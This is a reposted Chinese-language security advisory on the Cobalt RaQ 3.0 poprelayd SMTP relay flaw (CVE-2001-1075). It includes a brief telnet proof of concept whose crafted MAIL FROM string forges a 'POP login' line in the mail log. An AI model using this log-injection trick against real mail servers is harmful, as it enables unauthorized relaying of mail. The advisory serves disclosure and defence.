Cobalt Raq3 PopRelayd 任意SMTP转发漏洞

2008-04-09 04:31:31来源:互联网 阅读 ()

新老客户大回馈,云服务器低至5折

Cobalt Raq3 PopRelayd 任意SMTP转发漏洞

发布日期:2001-07-04
更新日期:2001-07-12

受影响系统:

Cobalt RaQ 3.0
描述:

BUGTRAQ ID: 2986
CVE(CAN) ID: CVE-2001-1075

poprelayd是一个基于客户登陆机制,负责从/var/log/maillog解析有效pop登陆的脚
本,允许登陆到pop服务的用户从他们访问系统的ip地址发送email。

但是poprelayd没有认证输出到/var/log/maillog的信息,这使得攻击者可能通过SMTP
创建任意的字符串,并被记录到/var/log/maillog中,这导致远程攻击者可能利用SMTP
转发邮件。

<*来源:Andrea Barisani (lcars@infis.univ.trieste.it) *>




测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


Andrea Barisani (lcars@infis.univ.trieste.it)提供了如下测试代码:

telnet dumbcobalt 25
Trying 123.123.123.123...
Connected to dumbcobalt
...
ehlo dumbcobalt
...
mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"
553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66
@linux.org"...Domain name required


建议:

厂商补丁:

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.cobalt.com/index.html



标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com
特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

上一篇:Microsoft Windows 2000 SMTP服务认证错误漏洞(MS01-037)

下一篇:Bugzilla 泄露敏感信息漏洞